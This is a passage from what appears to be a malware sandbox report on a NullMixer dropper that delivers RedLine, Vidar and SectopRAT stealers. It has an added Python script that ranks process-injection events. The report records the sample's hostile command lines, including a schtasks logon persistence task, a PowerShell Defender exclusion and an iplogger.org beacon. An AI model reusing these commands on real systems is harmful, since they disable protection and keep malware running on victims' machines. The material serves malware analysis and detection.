PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence
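Three of the signatures above need a caveat before they are read as evidence. The wextract_cleanup0 RunOnce value that points at advpack.dll,DelNodeRunDLL32 is the cleanup hook written by the Windows IExpress/WEXTRACT self-extractor, the same component that creates the IXP000.TMP directory; on its own it shows a self-extracting package, not attacker persistence (the persistence that matters is the services64 scheduled task in the process list). The AuthRoot\Certificates key written by 5d456d381f2e1.exe is the store that Windows automatic root update populates when a TLS chain ends in a root the Windows 7 image does not yet hold, so the thumbprint D1EB23A46D17D68FD92564C2F1F1601764D8E349 should be checked against the Microsoft Trusted Root Program list before it is treated as an attacker-installed root. And a parent writing into the memory of a child it has just created fires for every CreateProcess call, because the parent populates the child's process parameters that way; the row that carries signal is 1cr.exe (PID 2220) calling SetThreadContext on a second instance of 1cr.exe (PID 2180), which is the RunPE/process-hollowing pattern.

The script below is an added example, not part of this report or of the sandbox that produced it. It re-enters a few rows of the two tables above as constructed input and ranks each source-to-target PID pair by how strongly its events match injection, so that the one SetThreadContext row surfaces above the dozens of creation-time writes.

```python
"""Correlate per-process API events from a sandbox report into
injection findings.

Added example for this report; not part of the original page or of the
sandbox. The rows below are constructed from the behavioral1
'Suspicious use of SetThreadContext' and 'Suspicious use of
WriteProcessMemory' tables: (description, source image, target image).
"""
import re
from dataclasses import dataclass

SAMPLE_EVENTS = [
    ("PID 3048 wrote to memory of 1076",
     r"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe",
     r"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"),
    ("PID 1076 wrote to memory of 2756",
     r"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe",
     r"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe"),
    ("PID 2756 wrote to memory of 2720",
     r"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe",
     r"C:\Windows\SysWOW64\cmd.exe"),
    ("PID 2756 wrote to memory of 2720",
     r"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe",
     r"C:\Windows\SysWOW64\cmd.exe"),
    ("PID 2220 set thread context of 2180",
     r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe",
     r"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"),
]

EVENT_RE = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+)")


@dataclass
class PairActivity:
    """Everything one source PID did to one target PID."""
    src_image: str
    dst_image: str
    writes: int = 0
    context_sets: int = 0


def parse_event(description):
    """'PID 2220 set thread context of 2180' -> (2220, 'setcontext', 2180)."""
    m = EVENT_RE.fullmatch(description.strip())
    if m is None:
        return None
    kind = "write" if m.group(2).startswith("wrote") else "setcontext"
    return int(m.group(1)), kind, int(m.group(3))


def correlate(events):
    """Group events by (source PID, target PID), counting each kind."""
    pairs = {}
    for description, src_image, dst_image in events:
        parsed = parse_event(description)
        if parsed is None:
            continue
        src, kind, dst = parsed
        act = pairs.setdefault((src, dst), PairActivity(src_image, dst_image))
        if kind == "write":
            act.writes += 1
        else:
            act.context_sets += 1
    return pairs


def classify(act):
    """Severity and reason for one source->target pair."""
    same_image = act.src_image.lower() == act.dst_image.lower()
    if act.context_sets and act.writes:
        return "high", "memory writes plus SetThreadContext: process hollowing / RunPE"
    if act.context_sets and same_image:
        return "high", "SetThreadContext into a second instance of its own binary: RunPE-style self-hollowing"
    if act.context_sets:
        return "medium", "SetThreadContext into another process: thread hijack"
    # Writes alone into a child: CreateProcess writes the child's process
    # parameters itself, so this fires for every ordinary parent->child launch.
    return "info", "writes into a child at creation; expected for CreateProcess"


def rank(events):
    """Sorted findings: (severity, src_pid, dst_pid, reason), worst first."""
    order = {"high": 0, "medium": 1, "info": 2}
    rows = []
    for (src, dst), act in correlate(events).items():
        sev, why = classify(act)
        rows.append((sev, src, dst, why))
    rows.sort(key=lambda r: (order[r[0]], r[1], r[2]))
    return rows


if __name__ == "__main__":
    for sev, src, dst, why in rank(SAMPLE_EVENTS):
        print(f"{sev:6} {src:>5} -> {dst:<5} {why}")
```

Run against the constructed rows, the 2220 -> 2180 pair ranks high and every parent-to-child write pair ranks as informational; feeding the full tables in (the WriteProcessMemory table on this page is cut off after PID 2476) would only add more informational pairs unless a write lands on a target that also received a SetThreadContext.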

Processes

C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 432

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562940 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS6A38.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1580 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload


Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload


Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3608 set thread context of 2460 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
